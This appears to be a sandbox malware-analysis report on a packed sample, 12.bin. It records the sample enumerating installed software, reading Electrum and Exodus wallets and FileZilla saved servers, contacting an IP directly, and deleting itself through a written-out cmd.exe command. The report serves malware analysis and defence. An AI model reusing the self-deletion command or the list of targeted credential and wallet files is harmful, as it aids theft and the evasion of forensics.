RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000324 key_handle: 0x00000378 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000324 key_handle: 0x0000037c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1 base_handle: 0x00000324 key_handle: 0x00000380 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000324 key_handle: 0x00000384 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {1F1C2DFC-2D24-3E06-BCB8-725134ADF989} base_handle: 0x00000324 key_handle: 0x00000388 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000324 key_handle: 0x0000038c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x00000324 key_handle: 0x00000390 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1 base_handle: 0x00000324 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000324 key_handle: 0x00000398 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {8941A397-4065-4F41-92CE-0EB610846EED}_is1 base_handle: 0x00000324 key_handle: 0x0000039c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{8941A397-4065-4F41-92CE-0EB610846EED}_is1	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-0011-0000-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003a0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-0015-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003a4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-0016-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003a8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-0018-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-0019-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003b0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-001A-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003b4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-001B-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003b8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003bc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-001F-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-0028-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-002C-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-0044-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-006E-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003d0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-00A1-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003d4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {90140000-00BA-0412-0000-0000000FF1CE} base_handle: 0x00000324 key_handle: 0x000003d8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000324 key_handle: 0x000003dc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW July 22, 2021, 1:53 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000324 key_handle: 0x000003e0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1

Reads the systems User Agent and subsequently performs requests (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetOpenW July 22, 2021, 1:53 p.m.	proxy_name: proxy_bypass: flags: 0 user_agent: GBgMy82xUJQg3tQyrdJQ access_type: 0	1	13369372	0

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin"
cmdline	chcp 65001
cmdline	ping 127.0.0.1
cmdline	cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\12.bin"

The executable is likely packed with VMProtect (2 events)

section	.vmp0				description	Section name indicates VMProtect
section	.vmp1				description	Section name indicates VMProtect

Communicates with host for which no DNS query was performed (1 event)

host

134.209.203.126

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\12.bin

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Collects information about installed applications (40 events)

Time & API	Arguments	Status
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x0000031c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000328 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000338 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: MarkAny Inc. e-PageSafer V2.5 NoAX ( Basic )_2.5.1.18 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ePageSafer\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000340 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000344 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x0000035c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000360 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: TouchEn nxKey with E2E for 32bit regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TouchEn nxKey\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x0000036c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: INISafeWeb 5.0 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000370 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: INISafeWeb 6.0 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb6\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Delfino G3 (x86) version 3.6.6.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1CBD185A-9CB3-4f30-B7E4-75CC551455F9}_is1\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000384 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000388 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x0000038c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000390 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: G2BRUN regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5BEFEB79-2B4D-4EEE-9979-AFDE0A20FADE}_is1\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x00000398 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x0000039c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: WIZVERA Process Manager 1,0,5,4 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{8941A397-4065-4F41-92CE-0EB610846EED}_is1\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003a0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003a4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003a8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003ac regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003b0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003b4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003b8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003bc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003c4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003cc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003d0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003d4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003d8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (Korean) 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003e0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Reader 9 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	1
RegQueryValueExW July 22, 2021, 1:53 p.m.	key_handle: 0x000003ec regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Network activity contains more than one unique useragent (2 events)

process	12.bin				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
process	12.bin				useragent	GBgMy82xUJQg3tQyrdJQ

Appends a known CryptoMix ransomware file extension to files that have been encrypted (1 event)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet

12.bin

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All